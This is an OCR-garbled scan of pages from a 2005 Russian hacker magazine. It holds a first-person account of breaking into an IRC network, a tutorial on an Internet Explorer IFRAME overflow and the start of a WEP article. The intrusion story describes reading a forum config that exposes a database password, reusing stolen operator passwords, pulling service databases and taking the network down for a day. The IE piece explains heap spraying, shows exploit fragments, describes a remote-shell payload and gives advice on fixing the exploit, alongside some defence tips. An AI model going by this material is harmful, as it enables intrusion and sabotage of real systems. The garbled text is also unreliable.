го интересовал доступ к форуму. Поэтому я 
перешел в каталог /Ііоте/баІпеѴѵѵѵѵѵѵ/баІ- 
пеІгіИогит и выполнил команду "саГ для 
файла сопТід.рІпр. В результате увидел кон- 
фиг форума, в котором черным по белому 
были видны пароль к Му80І_-базе сервера 
и прочие настройки: 

$(Шт$ = "[вдГ; 

сІЬІіозі = "ІосаМ"; 

$сІЬпате = "гіаіпеіги"; 

ЗбЬизег = "баіпеіги"; 

ЗбЬраззѵѵсІ = "сЫпе^ши-сР 1 ; 

$іаЫе_ргейх = "рІірЬЬ,": 

Теперь, используя полученные данные, я мог 
спокойно получить доступ ко всей пользова- 
тельской информации форума. Для этого я 
воспользовался программой рітртуасітіп, о ко- 
торой мы уже неоднократно писали на страни- 
цах журнала. В общем-то все, база данных те- 
перь моя :). Однако я не спешил завязывать с 
беспределом, мне было интересно, что же на- 
ходится в остальных директориях. 

Л ПР0Д0ПЖ0ЕИ БЕСПРЕДЕЛ 

К огромному сожалению, моего пользовате- 
ля, под которым выполнялись команды, не 
пускали ни в какие директории, кроме шт и 
зегѵісез-МиЬ. Однако, как ни странно, хватило 
одной директории зегѵісез-ІтиЬ, в которой 
был найден файл ігссі. сопТ. Для крутых тан- 
кистов вроде тебя следует пояснить, что это 
главный конфигурационный файл ІВС-демо- 
на, в котором хранятся пароли на получение 
статуса ІВС-оператора в сети и еще кое-ка- 
кие вкусности. Открыв файл, я увидел доста- 
точное количество информации, однако 
больше всего меня интересовали зашифро- 
ванные пароли админов: 




■■^■ігаж^й ні ар 

■«« І-Ьвч! ш Цаѵ 





Просмотр сопТід.рИр 



і 



0;*@*;еѵгеус!іап:Ре№еІсІ_:гК0!ідѵѵІсІкКІ)Вп6и! л еѴ/о0аАМѵ:1 

0:*@*^Рі0(Ш9830Ікс1:АЗгеу$егдеу:гК0ІідѵѵІсІкКЬВп6иГ л еѴѴо 

0аА№:1 

0:*@*:ЬаЬасІіег:ѴоІопа:е5сдгѴ0РИдѵѵІкКЬВпАаМСТиГ2ѴѴ5Уѵ л :1 

Зная, что РеіТіеІсІ владеет как минимум тре- 
мя серверами в сети, и надеясь, что пароль 
на орег-лайн подойдет, я зашел через один 
из них в сеть (всегда можно узнать, кто ад- 
мин сервера, при помощи команды /абтіп). 
Выбрав время, когда в сети нет технического 
начальства, я попробовал получить статус ир- 
копа при помощи найденных и расшифрован- 
ных паролей. К моей радости эта затея уда- 
лась, но возникла непредвиденная проблема: 
сервисы снимали самые заветные флаги МоаА 
:(. В далнете стоят хорошие сервисы, на кото- 
рых нужно идентифицировать не только ник 



(ібепМу), но и сервис-доступ (оібепМу). 
Конечно, можно было забить на все и остано- 
виться на достигнутом. Вполне можно было 
использовать те доли секунды между получе- 
нием модов оператора на сервере и снятием 
их сервисами, забив заранее заготовленные 
команды в автовыполнение клиента, ну нап- 
ример так вот: 

/орег Ре№еІ(]_ еѵгеусііап 
/кіІІ Рап(1іт148 тынц 
/$еіІіо$і когоЫаІМги 
/дііпе *@тісгозоГС.сот 6илл_спит 

Соединяемся, выполняется перформ, серви- 
сы снимают с нас моды, но остается мод +ѴѴ, 
который позволяет тебе видеть, когда кто-то 
делает /ѵѵИоіз-запрос на твой ник. 





л В ІРС всегда 
можно узнать, кто 
админ сервер, при 
помощи команды 
/асітіп. 




л Во время описы- 
ваемого взлома 
был изменен ава- 
тар первого чело- 
века сети, удалены 
все посты, кроме 
одного, а также по- 
лучен доступ ко 
всем директориям 
сервера. 
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КОК ПОМОЮТ ІВС-СЕТИ 



Первая известная атака на ІВС-сеть состоялась в июле 1992 
года, когда была найдена критическая уязвимость в ЗипОЗ 
4.1 (также 4.1.1 и 4.1.2), связанная с неверной обработкой 
істр-пакетов при их перенаправлении и позволяющая зак- 
рывать существующие соединения с системой (подробнее о 
баге: ѵѵѵѵѵѵ.сегІ.огд/асІѵізогіез/СА-1 992-1 б.МтІ). 

Следующая крупная атака состоялась в октябре 1 997-го, 
когда ІВС уже пользовалось более 30 000 человек по 
всему миру. Тогда атакующие применили знаменитую 
технику зтигТ, во время которой целевой сервер перегру- 
жают приходящие из различных сетей и от различных 
машин пакеты с ответом на подделанный широковеща- 
тельный ісплр-запрос атакующего (реализация атаки: 
ІіПр://раскеізіогтзесигіІу.пІ/ЕхрІоіІ_СосІе_АгсИіѵе/зтигі.с). 

С марта 2002 года стали широко известны случаи 
применения социальной инженерии в ІВС. При этом 
атакующий заставляет жертву под каким-либо пред- 
логом установить на свой компьютер разрушитель- 
ную программу. Обычно он выдает ее за свою фотог- 
рафию или порно-фильм :). Почитать об этом можно в 
занимательной статье по адресу ѵѵѵѵѵѵ.сеіі.огд/іпсі- 
сІепІ_поіез/ІМ-2002-03.ИітІ. Зачастую атаки проводятся 
непосредственно против пользователей ІВС-сетей. 

Чтобы предотвратить это, на многих серверах включе- 
на функция скрытия клиентского адреса. Вместо полно- 
го адреса отображается только его часть или вообще 
один шифр. Но и это не всегда спасает: например, в 
свое время находили уязвимости в таких популярных 
ІВС-серверах, как ІІпгеаІІВСсІ или РТЫпк, позволяющие 
получить информацию о хосте любого пользователя. 



Даже если прямой адрес клиентского компьютера не 
известен, можно вызвать отключение его от ІВС-сети 
такими методами, как, например, бомбардировка 
приватными или сіср-сообщениями (пинг, запрос вер- 
сии клиента, времени и прочего). От этого может за- 
щитить хорошее программное обеспечение на ІВС- 
сервере либо защитные скрипты на клиентской сто- 
роне. Подробнее я бы посоветовал тебе поговорить 
об этом с администратором твоего сервера или с хэл- 
пером сети. 

Как и любые другие сетевые сервисы, ІВС-серверы под- 
вержены ООоЗ-атакам. При этом за минуты через ли- 
нию проходят зачастую многие гигабайты трафика. Что- 
бы устоять под таким напором, может не хватить и само- 
го мощного сервера с отличным подключением к Сети. 
ООоЗ-атаки являются с 1999 года одной из ключевых 
сетевых проблем (прочти эту статью: ИПр://зіаН.ѵѵазИіпд- 
Іоп.ейи/^іПгісИ/тізс/сісіозЛітеІіпе.ІіІтІ). 

ІВС-серверы могут быть использованы не только как 
цель атаки, но и как средство ее проведения и конт- 
роля. Например ІВС-канал можно использовать как 
инструмент для управления ботами, однако такие 
фишки легко просекаются даже пьяным админом. 

Также в любом более или менее популярном софте 
время от времени могут находить критические ошиб- 
ки и уязвимости. В этом случае важно как можно ско- 
рее их исправить - до того, как кто-нибудь ими вос- 
пользуется. Следи за новостями от разработчиков и 
старайся использовать актуальные и стабильные вер- 
сии программ. 





База данных МскЗегѵ'а 



Но это все как-то по-детски. Интуиция подска- 
зывала мне, что можно копнуть и поглубже. Ра- 
ди интереса я зашел на форум и попробовал 
ввести данные администратора из О-Ііпе'а. Как 
ни странно, тут мне повезло. Не долго думая, я 
поменял аватар главного чухана в сети, потер 
все посты, кроме одного, о содержимом кото- 
рого теперь ты можешь только догадываться :). 

Л ШЕСТОЕ ЧУВСТВО 

Однако этого мне было мало. Хотелось под- 
нять полноценные привилегии в этой ІРС-се- 
ти. И гут опять сработала интуиция. Помнишь 
пароли к базе Му50І_? Так вот, методом тыка 
и подборки имени аккаунта я нашел рабочий 
доступ к Йр-серверу баі.пеі.ги! Что было 




Сайт сети (Іаі.пеіги 



дальше? Правильно. Я получил полный дос- 
туп ко всем директориям сервера и начал 
быстренько стягивать содержимое директо- 
рий зегѵісез и ігссі. Особенно меня интересо- 
вали файлы піск.бЬ, сМап.сІЬ и тето.бЬ, а 
также конфиги. После того как я получил базу 
никсерва, проблем не возникло. Поскольку в 
далнете пароли не шифровались, я лихо 
отыскал нужные пассворды и не обломался: 
«РаззѵѵогсІ ассеріеб. Ѵои аге поѵѵ гесодпііеб». 
Тут неожиданно появилась функция КІіскЗегѵ'а 
для идентификации оператора сервисов. Для 
чего она была сделана и зачем, я так и не 
вкурил, но меня обрадовал тот факт, что па- 
роль от ібепШу подходил к оібепШу. Наиграв- 
шись и получив все, что я хотел от поломан- 
ного сервера, я затер все КІ/С-лайны, отвеча- 
ющие за соединения с другими серверами, и 
рестартнул сервер. На 24 часа сеть умерла. 
Вот такой я моральный урод :(. 



Л выводы 

Таким образом, при помощи тупого бага в 
рМрВВ я получил кучу полезностей и инте- 
ресной информации. Огромное спасибо ха- 
латности админов сети, которые на все 
ставят одинаковые пароли и пускают все се- 
тевые сервисы под одной учетной записью. 
Для тех, кто не понял: я поломал не просто 
один из серверов сети, а главный сервер - 
таіп.ІіиЬ.баІ.пеТги. 

На момент написания статьи баг с форумом 
был уже устранен, как и сам форум, но при 
сканировании на уязвимости была найдена 
куда более серьезная проблема, позволяю- 
щая поднять рутовые права :). Но об этом 
как-нибудь в следующий раз. □С 




58 







ВСЕ УШЛИ ИГРАТЬ В 

РІАѴ$ТАТІ(Ш 2 



ТОЛЬКО У НАС 
ЦЕНА НА РІАУОТАТІОИ 2 










ремя идет, а дыры в програииах остаются. Количество важных иашин исчисляется миллионами - о лучшем подарке к Новому году 
хакеры не могли и мечтать. Недавно в ІЕ было найдено очередное переполнение буфера, на этот раз в тэге ІГКПМЕ. Для нового бага уже 
появился эксплоит. Не совсем работающий, но уже растиражированный по всей Сети. Как отремонтировать его? Как переписать зНеІІ- 
код? Как защитить свой компьютер от атак? 



кок размножаются черви в шениет ехрюнен 




А источник заразы 

В начале ноября 2004 года в 

МісгозоЙ ІпІегпеІ Ехріогег была 
обнаружена очередная уязви- 
мость: переполнение буфера в 
плавающих фреймах (тэг 
ІРРАМЕ) позволяет передавать 
управление на зітеіі-код и зах- 
ватывать управление машиной, 
после чего жертву террора можно насиловать 
как угодно и чем угодно. Например использо- 
вать как плацдарм для дальнейших атак или 
спама, похищать конфиденциальную инфор- 
мацию, бесплатно звонить за бугор и много 
еще чего. Уязвимости подвержены: ІЕ версий 
5.5 и 6.0 и Орега 7.23 (другие версии не про- 
верял). Неуязвимы: ІЕ 5.01 ЗРЗ или ЗР4, ІЕ 
5.5 ЗР 2, ІЕ 5.00 на ѴѴіпсІоѵѵз 2000 без сер- 
вис-паков, ІЕ 6 на ѴѴіпсІоѵѵз Зегѵег 2003 без 
сервис-паков, ІЕ 6 на ѴѴіпсІоѵѵз ХР ЗР 2. По 
умолчанию ІЕ не запрещает выполнение пла- 
вающих фреймов в интернет и интранет-зо- 
нах. Чтобы подцепить заразу, жертве доста- 
точно зайти на ІЖ с агрессивным кодом 
внутри. С (МІоок Ехргезз дело обстоит иначе: 
НТМІ_- письма открываются в зоне ограничен- 
ного доверия и тэги ІРНАМЕ по умолчанию не 
обрабатываются. ^ѵаЗсгірі не может самосто- 
ятельно вызвать переполнение буфера при 



просмотре письма, и для активации зМеІІ-кода 
жертва должна взять в руки мышь и кликнуть 
по ядовитой ссылке. Уже появилась новая 
версия интернет-червя МуОоот, использую- 
щая эту технологию для своего распростране- 
ния, да и новые черви не за горами, так что 
не теряй бдительности и не кликай по ссыл- 
кам, если не доверяешь им на 100%. 




Позитивная картинка с сайта ВегегкЫап ѴѴеѵег наводит на 
какие-то эротично-цифровые размышления 



А ТЕХНИЧЕСКИЕ ПОДРОБНОСТИ 

Переполняющий код в общем случае выглядит 
так: СІРВАМЕ згс=ТИе://АААААА 
пате="ВВВВВВхх"Х/ІРПАМЕ>, гдеААААААи 
ВВВВВ - текстовые строки строго дозирован- 
ной длины, набранные в ІІІМІСШЕ, а хх - сим- 
волы, затирающие указатель на виртуальную 
функцию экземпляра ООП-объекга, находящу- 
юся внутри динамической библиотеки 
ЗРЮОСѴѴѴ.ОІІ. Дизассемблерный листинг уяз- 
вимого кода приведен ниже (конкретные адре- 
са варьируются от одной версии ІЕ к другой): 



Фрагмент ІЕ, обеспечивающий передачу управле- 
ния на зііеІІ-код 



7178ЕС02 8В08 МОѴ ЕСХ.01Ш 

РТК [ЕАХ] 

7178ЕС02 [загружаем указатель на таблицу 
виртуальных функций 
7178ЕС02 ; некоторого ООП-объекта 
7178ЕС02 ; после переполнения в регистре ЕАХ 
окажутся символы хх, 

7178ЕС02 ; расположенные в хвосте ІШІШЕ-строки с 
именем файла 

7178ЕС02 

7178ЕС04 68 847В 70 71 РИ5Н 71707В84 

7178ЕС04 ; заталкиваем в стек константный указатель 
7178ЕС04 
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7178ЕС09 50 Р115Н ЕАХ 

7178ЕС09 ; заталкиваем в стек указатель Ші$, 

7178ЕС09 ; указывающий на экземпляр ООП-объекта 
7178ЕС09 ; с таблицей виртуальных функций внутри 
7178ЕС09 

7178ЕС0А ЕЕ 11 САН МЕАК РѴѴОРО РТР [ЕСХ] 

7178ЕС0А ; вызываем виртуальную функцию по 
указателю ЕСХ, 

7178ЕС0А ; теперь уже затертому и содержащему 
подложные данные 

Двойной косвенный вызов функции по указа- 
телю причиняет хакеру дикую головную боль, 
разрывая напополам мозги с задницей изнут- 
ри. Засунуть в ЕАХ указатель на произвольную 
область памяти не проблема. Сложнее до- 
биться, чтобы по этому адресу был располо- 
жен указатель на зМеІІ-код, местоположение 
которого наперед неизвестно. Как же быть? 

А КОПБПСИМ ЭКСПЛОИТ 

Первым эту задачу решил нидерландский ха- 
кер ВегепсЫап ѴѴеѵег совместно с Ыагсіе и 
НЮМ, сконструировавший более-менее рабо- 
тоспособный эксплоит с кодовым названием 
ВоР РоС ехріоф демонстрационный вариант 
которого можно скачать с домашней странич- 
ки автора: шѵѵ.ебирМеІІі.пНішег. 

Как он работает? 

Сначала запускается ^ѵаЗсірІ-код, заполня- 
ющий практически всю доступную динами- 
ческую память порзіісіез-блоками. В начале 
каждого такого блока расположено большое 
количество указателей на адрес (Ю(Ю(Ю(ЮІі 
(произвольное значение), а в конце находит- 
ся непосредственно сам зМеІІ-код. Если хотя 
бы один порзіісіез-блок накроет своей тушей 
адрес (Ю(Ю(Ю(ЮІі, в ячейке (Ю(Ю(Ю(ЮІі с не- 
которой вероятностью окажется указатель на 
(Ю(Ю(Ю(ЮІі. И какова же эта вероятность? 
Попробуем рассчитать. Куча, она же динами- 
ческая память, состоит из блоков размером в 
1 Мбайт. Из них 60 (ЗОН) байт съедает слу- 
жебный заголовок, а все остальное отдано 
под нужды пользователя. Стартовые адреса 
выделяемых блоков округлятся по границе в 
64 Кбайт, поэтому блок, перекрывающий ад- 
рес (Ю(Ю(Ю(ЮІі, может быть расположен по 
любому из следующих адресов: (ЮОІООООІі, 
(Ю020000І1 ... ООООООООІі. В худшем случае 
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Динамическая память ІЕ под микроскопом ЬогбРе Оеіихбе (битр - 


■> битр гедіоп) 



расстояние между ячейкой ОООООООО и кон- 
цом порзіісіез-блока будет составлять 775 
байт, если служебный заголовок идет внача- 
ле, и 695 байт, если служебный заголовок 
идет в конце. 

Таким образом, если размер зМеМ-кода не 
превышает 651 байт (695 байт минус длина 
32-разрядного указателя) и хотя бы один 
порзіісіез-блок перекрывает адрес 
ООООООООІі (что вовсе не факт!), вероятность 
его срабатывания равна единице. Следует 
заметить, что значение указателя выбрано 
достаточно удачно. В ІЕ версии 5.x куча начи- 
нается с адреса 01 8С0000И и простирается 
вплоть до 1 0ООООООТі, так что адрес 
ООООООООІі попадает в окрестности верши- 
ны. По умолчанию ІЕ открывает все окна в 
контексте одного и того же процесса, и с 
каждым открытым окном нижняя граница ку- 
чи перемещается вверх, поэтому трогать 
младшие адреса нежелательно. Тем не ме- 
нее, если заменить ООООООООІі на 




Рост темпов использования памяти при запуске эксплоита на выполнение 



0А0А0А0АМ , можно обойтись значительно 
меньшим количеством порзіісіез-блоков. 
Стратегию выделения динамической памяти 
удобно исследовать в утилите І_огсІРЕ Оеіихе 
или любой другой, способной отображать 
карту виртуальной памяти произвольного 
процесса. Но мы, похоже, забрели не в ту 
степь. Оставим теоретические дебри и вер- 
немся к нашим баранам. 

На второй стадии атаки в игру вступает тэг 
ІРВАМЕ, вызывающий переполнение буфе- 
ра и засовывающий в регистр ЕАХ значе- 
ние ООООООООІі. Уязвимый код, располо- 
женный в динамической библиотеке 
8НООСѴѴѴ.ОИ, считывает двойное слово 
по адресу ООООООООІі (а оно, как мы пом- 
ним, при благоприятном стечении обстоя- 
тельств будет равно ООООООООІі) и переда- 
ет на него управление, попадая внутрь 
принадлежащего ему порзіісіе-блока. 
ООООООООІі -указатели, в большом количе- 
стве расположенные в его начале, интерп- 
ретируются процессором как машинные 
команды ОН ЕАХ, ООООООООІі, которые не 
делают ничего полезного. Управление спо- 
койно докатывается до зііеіі-кода, и он, 
следуя зову природы, подчиняет удален- 
ную машину воле атакующего. 

Проблема в том, что по соображениям безо- 
пасности ЗаѵаЗсгірІ не дает прямого доступа 
к виртуальным адресам и занимается выде- 
лением памяти самостоятельно, а это значит, 
что захват адреса ООООООООІі не гарантиро- 
ван даже при выделении всей доступной 
скрипту памяти, хотя с ростом количества 
порзіісіез-блоков шансы на успех увеличива- 
ются. С другой стороны, при выделении 
большого количества порзіісіез-блоков опера- 
ционная система начинает дико тормозить и 
шуршать жестким диском, а хронология ис- 
пользования памяти в диспетчере задач рас- 
тет как на дрожжах (см. рис. 3), что момен- 
тально демаскирует атакующего, не говоря 
уже о том, что у нормальных пользователей 
скрипты всегда отключены. 

Так что атака носит сугубо лабораторный ха- 
рактер и в диких условиях неработоспособна. 




а В исследова- 
тельских целях 
оригинальный 
эксплоит можно 
забрать по этому 
адресу: шл/ѵ.есіир. 
ІисІеІІІ.пІ/-Ьіѵѵеѵег/ 
ехрІоі(з/І піегпеі 
Ехріоііег.гір, а 
здесь лежит убогая 
перепечатка: 
ѵѵѵѵѵѵ.зесигіІуІаЬ.ги/ 
49273. Мт I. 



а Следует отдавать 
себе отчет в том, 
что эта статья бы- 
ла написана иск- 
лючительно в ис- 
следовательских 
целях и любые 
твои действия, на- 
рушающие законы 
страны, в которой 
ты проживаешь, 
могут привести к 
уголовной ответ- 
ственности. 



а На нашем диске 
ты найдешь авгус- 
товский «Спец» 
«Переполнение бу- 
фера», который 
поможет тебе 
адекватно воспри- 
нять эту статью. 
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ЖУРНАЛ 

О КОМПЬЮТЕРНОМ 



ХПКЕР/№02(74)/2005 




О Тесты 

Открытый тест: НОР МРЗ-плееры 
Готовые системные блоки до $900 
ОеаЛітаТсІі-тест: интегрированный 
звук против РСІ и внешнего 
Огромные жесткие диски 
Мощные блоки питания 
Оверклокерская память 

О Инфо 

Мелочи железа 
Эволюция гибких магнитных 
носителей 

Технология модемной связи 
ГАО 

О Практика 

Разгон на оверклокерской матери 
Ремонт СКТ-монитора 
Моддинг: часы из винта 



ЖУРНАЛ КОМПЛЕКТУЕТСЯ 
ДИСКОМ С ЛУЧШИМ СОФТОМ 




ТВОЯ МАМА 
БУДЕТ В ШОКЕ! 




Фрагмент оригинального эксплойта: все строки набраны в УШСООЕ и в конце находится код 000000006 



Однако расслабляться все-таки не стоит, 
поскольку возможны и более элегантные 
сценарии переполнения (некоторые идеи со- 
держатся в «Записках исследователя компь- 
ютерных вирусов» Криса Касперски). 



Сокращенный код эксплойта 



<$СКІРТ Іапдиаде= п ]аѵа$сгірГ> 

</ЗСКІРТ> 

<ІЕКАМЕ ЗРС=ЛІе://ВВВВ ВВВВВВ 

ШЕ="ССС СССС** П > 

</ІЕКАМЕ> 

Этот эксплойт содержит зііеіі-код, на кото- 
рый передается управление после перепол- 
нения буфера и который устанавливает на 
28867 порту удаленный зііеіі для стсі.ехе. 
Переменная Ііеасіегзіге - это размер служеб- 
ного заголовка, который цепляется к каждо- 
му блоку памяти, выделяемому из кучи (в 
двойных словах). После инициализации ос- 
новных переменных конструируются пор- 
зіісіез-блоки, главное здесь - подогнать раз- 
мер так, чтобы выделяемые регионы дина- 
мической памяти следовали вплотную друг к 
другу без зазоров между ними. Затем в 
зіаскзрасе заносится сумма длин зМеІІ-кода 
и служебного заголовка, а затем создается 
ЬідЫоск, заполненный символами 
(Ю(Ю(Ю(ЮІі. После этого в ТіІІЫоск копирует- 
ся зіаскзсаре двойных слов, фактически об- 
резая ЬідЫоск по заданной границе. Это, ко- 
нечно, тупое решение, однако оно работает. 

А РЕПНИМПЦИЯ эксппоитп 

Последствия практического применения 
эксплоита варьируются от «не совсем рабо- 
тает» до «совсем не работает», и прежде чем 
эта штука реально заведется, выбросив из 
выхлопной трубы едкие газы дампа памяти, 
над ней придется попыхтеть. Пиво, сигаре- 
ты, косяки по вкусу, а вот прекрасную поло- 
вину лучше из поля зрения убрать, посколь- 
ку женщины пагубно влияют на хакеров. 
Начнем с того, что в Сети появилось множе- 
ство перепечаток исходного текста эксплои- 
та, например на ии«.$есигіІуІаЬ.ги/49273.МпІ, не- 
обратимо его угробивших. Во-первых, код 
должен быть представлен в кодировке ІІІЧІ- 
ССЮЕ, а не АЗСІІ. Во-вторых, символы 
(ЮОО(Ю(ЮІі, расположенные в хвосте пере- 
полняющей строки, в перепечатках замеща- 
ются какой-то шнягой. В-третьих, внедрение 
лишних переводов каретки в переполняю- 
щие строки и зЬеІІсосІе-строку категорически 
недопустимо, но при перепечатке эксплоита 
все происходит именно так! 

Всегда нужно использовать только ориги- 
нальный ВоР РоС ехріоіі, а лучше - его слег- 
ка усовершенствованный вариант. Для нача- 
ла необходимо сбалансировать код: если 
расстояние между первой выполняемой ко- 



мандой порзіісіез-блока и началом зЬеІІ-кода 
не будет кратно пяти (пять байт - длина 
инструкции ОВ ЕАХ, СЮ(Ю(Ю(ЮОІі), прои- 
зойдет заем байт из зЬеІІ-кода, что неминуе- 
мо его разрушит. Создание буферной зоны в 
начале зЬеІІ-кода из четырех команд МОР 
(90Ь) решает проблему. 

А СОБСТВЕННЫЙ 8НЕІ1-К0Д 

Стратегия разработки зЬеІІ-кода вполне 
стандартна. Устанавливаем регистр ЕЗР на 
безопасное место (в данном случае на 
(ЮОІХНХЮІі), определяем адреса АРІ -функ- 
ций прямым сканированием памяти или че- 
рез блок окружения процесса (Ргосезз 
ЕпѵігоптепІ ВІоск, или сокращенно РЕВ), 
создаем удаленное ТСР/ІР-соединение в 
контексте уже установленного (этим мы ос- 
лепляем брандмауэры) и затягиваем основ- 
ной исполняемый модуль, сохраняя его на 
диске (это просто, но слишком заметно) или 
в оперативной памяти (сложная реализация, 
зато какой результат!). 

Ограничений на размер зЬеІІ-кода практи- 
чески нет - в нашем распоряжении чуть 
больше пол килобайта памяти. Строка предс- 
тавлена в формате ІІІМІСООЕ, а это значит, 
что в ней могут присутствовать одиночные 
нулевые символы, поэтому извращаться с 
расшифровщиками нет никакой необходи- 
мости. ЗМеМ-код наследует все привилегии 
браузера (а большинство неопытных пользо- 
вателей запускают его с правами админист- 
ратора), поэтому его возможности ограниче- 
ны разве что фантазией разработчика. 
Подробное описание техники разработки 
эксплоитов потребовало бы отдельной темы 
номера, и ведь такая тема номера недавно 
была! Смотри августовский «Спец», его ты 
найдешь еще и на нашем диске в рбТ. За 
подробным разъяснением я бы посоветовал 
обратиться к «Запискам исследователя 
компьютерных вирусов II», которая скоро 
выйдет в издательстве «Питер». 

А кок защититься? 

Установка сервис-паков, горячо рекомендуе- 
мая многими специалистами по безопаснос- 
ти, устраняет уже обнаруженные дыры, но 
оставляет массу еще неизвестных, так что в 
целом ситуация остается неизменной. Нужно 
найти простое и практичное решение, заты- 
кающее дыры раз и навсегда, а не дергаться 
по каждому поводу, тем более что поддерж- 
ка «морально устаревших» с точки зрения 
М іеговой операционных систем и браузеров 
уже прекращена, но переход на «суперзащи- 
щенную» ѴѴіпсІоѵѵз ХР лично меня совсем не 
радует. Лучше уж сразу на РгееВЗО. 

К сожалению, панацею от всех бед выду- 
мать невозможно (Парацельс вон и тот на 
ней все зубы пообламывал), но вот усилить 
защищенность своего компьютера можно 
вполне. Зайди в Сервис -> Свойства 




Тот же самый фрагмент после перепечатки: строки в АЗСІІ, код 000000006 превращен в ЗЕЗЕ6 







КОК ГПОБОПЬНО РЕШИТЬ ПРОБЛЕМУ? 






Хакерская активность растет с каждым днем, пробивая новые 
бреши в мелкософтных программах и особенно в ІпіегпеІ Ехріогег. 
Может, стоит перейти на Орег'у или же вовсе эмигрировать на 
другую операционную систему, например ипіх-Ііке? Увы, баги 
водятся не только в продуктах МісгозоЙ, они есть и у остальных. 
Другое дело, что методы борьбы с ними различны. Обладатели 
коммерческого кода вынуждены ждать заплаток словно милости 
от природы, а если производитель вдруг прекратит поддержку 
продукта, в срочном порядке переходить на новую версию (даже 
если она нафиг не нужна) либо же хачить программу 
непосредственно в машинном коде, теряя на это уйму времени и 
мозговых извилин. При наличии исходных текстов заплатка 
изготавливается элементарно, а децентрализованная модель 
разработки операционных систем семейства ІІІМІХ позволяет 
забыть об амбициях конкретного производителя. Не выпустит 
вовремя заплатку - ну и хрен с ним, это сделают другие. Тем не 
менее, без заплаток дело все-таки не обходится. К тому же 
качество оптимизации некоторых ІІМХ-систем, прямо скажем, 
находится не на высоте. Ты не ставил Федорино горе 3.0 на Р-ІІІ 
733? Сдохнуть можно, пока она загрузится! КІМОРРІХ 3.7 
выглядит лучшей альтернативой - нормально грузится с СО, не 
требуя установки на жесткий диск, послушно выходит в интернет 
по РРР, лазает по ѵѵеЬ'у, проверяет почту, открывает документы 
М3 ѴѴогсІ и рсІТ, но так при этом тормозит, что поневоле начинаешь 
задумываться - так ли плоха МісгозоЙ, как ее малюют? 




Настойка политики безопасности в браузере 



обозревателя -> Безопасность и заставь 
браузер запрашивать подтверждение на за- 
пуск программ и файлов в окне ІРРАМЕ и 
выполнение сценариев и объектов АсйѵеХ 
во всех зонах безопасности (интернет, 
местная интрасеть, надежные и ограничен- 
ные узлы). Большинство сайтов нормально 
отображаются и без скриптов. Там же, где 
скрипты действительно необходимы, их 
можно разрешить явно, (но это должны 



быть нормальные сайты крупных компаний, 
а не какие-то там отстойники). 

Еще надежнее установить ѴМѴѴаге и запус- 
кать браузер под управлением виртуальной 
машины. Можно смело блуждать по трущо- 
бам интернета, не боясь подцепить заразу. 
Естественно, ѴМѴѴаге защищает только от 
атак на браузер, но не на саму операцион- 
ную систему, поэтому тебе также потребует- 
ся брандмауэр. В ѴѴіпсІоѵѵз ХР он встроен 




Сайт с оригинальным эксплоитом 



изначально, а поклонникам ѴѴіпсІоѵѵз 2000 
(сам к таковым отношусь!) я рекомендую ус- 
тановить Зудаіе РегзопаІ РігеѵѵаІІ версии 4.5, 
бляго для домашних пользователей он бесп- 
латен. Более свежие версии уже просят де- 
нежек или требуют применения ломалки. 

Что же касается ѴѴіпсІоѵѵз 98, то она и без 
брандмауэра неплохо справляется. 

Конечно, работать с виртуальными машинами 
не слишком удобно. Они кушают много памя- 
ти и требуют мощных процессоров, поэтому 
можно пойти на компромиссный вариант: 
создать нового пользователя с ограниченны- 
ми правами (Панель Управления -> Пользо- 
ватели и пароли), лишить его доступа ко всем 
ценным папкам и документам (Свойства фай- 
ла -> Безопасность) и запускать ІЕ и (МІоок 
Ехргезз от его имени (Свойства ярлыка -> 
Запускать от имени другого пользователя). 
Сохраняя ѵѵеЬ-страницы на диск, имей в ви- 
ду, что при локальном открытии НТМЬфай- 
лов интернет-политика безопасности не 
действует, ^-скрипты и плавающие фреймы 
выполняются автоматически, без запросов 
на подтверждение, и потому вирус может 
легко просочиться в основную систему. 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес $кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 



а Все грамотные люди, которые имеют дело с сетью, 
используют ЛгеѵѵаІІ. Поэтому не менее грамотные ви- 
русописатели придумывают методы обхода "огненных 
стен". Одним из методов является передача информа- 
ции во вне под видом браузера, стоящего по умолча- 
нию. Итак, совет: в своем НгеиаІГе внеси в список зап- 
рещенных программ Іпіегпеі Ехріогег - обычно именно 
он является браузером по умолчанию. И пользуйся 
альтернативным браузером, например Оперой. 



Зіпісіп 

іѵа$Іікіп@ѵ$тро.ги 
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0 сен известно, что задачи защиты информации в беспроводных сетях до недавнего времени быпи возложены на протокол ШЕР, который 
свою миссию благополучно провалил. Именно благодаря его слабостям существует огромное количество утилит из серии «нажми кноп- 
ку и почувствуй себя хакером, сломав беспроводную сеть». Сегодня я расскажу тебе, чем так плох ШЕР и за счет чего работают все эти 
крутые программы дня взлома Ші-Еі. т 



онтология уязвимостей и атак на протокол «тер 



Л БЕСПРОВОДНЫЕ ПРОБЛЕМЫ 

О дновременно с разработкой 
стандартов беспроводной свя- 
зи (ІЕЕЕ 802.1 1 ) вставал воп- 
рос безопасности. Беспровод- 
ные технологии отличаются от 
проводных физической сре- 
дой передачи данных, и это 
различие накладывает свои 
отпечатки. В частности, использование бесп- 
роводных сетей предполагает специфичес- 
кие ответы на следующие вопросы: 

* Как мы защитим свою сеть 
от прослушивания трафика? 

* Как мы защитим свою сеть 
от модификации трафика? 

* Как мы защитим свою сеть 

от неавторизованного доступа к ней? 

В проводной сети использование программи- 
руемых коммутаторов обеспечивает опреде- 
ленную защиту от прослушивания трафика. В 
беспроводной сети невозможно контролиро- 
вать доступ - любое устройство, находящееся 
в охватываемом диапазоне, по сути, уже яв- 
ляется участником сетевого взаимодействия. 
Значит, надо обеспечить должную защиту на 
канальном уровне. С этой целью был разрабо- 



тан протокол МЕР - ѴѴігесІ Ециіѵаіепі Ргіѵасу. 
Как следует из названия, его цель - дать адек- 
ватный уровень защиты, такой же, как если 
бы сеть была проводной. МЕР призван ре- 
шить три основных проблемы безопасности: 

4 Конфиденциальность. 

Защита от чтения злоумышленником 
беспроводного трафика. 

* Контроль доступа. 

Защита от неавторизованного использования 
злоумышленником ресурсов сети. 

4 Целостность данных. 

Защита от модификации злоумышленником 
передаваемых по беспроводной сети данных. 

Как ты увидишь далее, ни одна из этих задач 
не была решена. 

^ 0ПИС0НИЕ ПРОТОКОЛ» 

Отправитель и получатель используют об- 
щий секретный ключ к, который, допустим, 
первоначально передается отправителю по- 
лучателем по защищенному каналу. Для того 
чтобы передать сообщение М, отправитель 
выполняет следующие действия: 

О Независимо от ключа к считает контроль- 
